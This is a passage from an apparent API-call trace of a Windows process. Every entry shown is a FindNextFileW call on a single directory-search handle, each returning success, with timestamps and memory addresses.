lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.415] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.416] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.416] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.416] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.416] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.416] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.416] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.435] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.435] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.435] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.435] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.435] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.435] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.435] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.435] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.435] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.436] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.442] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.448] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.448] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.449] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.450] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.450] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.450] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.450] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.479] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.479] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.480] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.481] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.481] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.481] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.481] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.482] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.486] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.487] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.489] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.490] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.492] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.492] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.492] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.492] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.492] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.492] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.492] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.492] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.492] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.493] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.495] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.496] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.496] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: 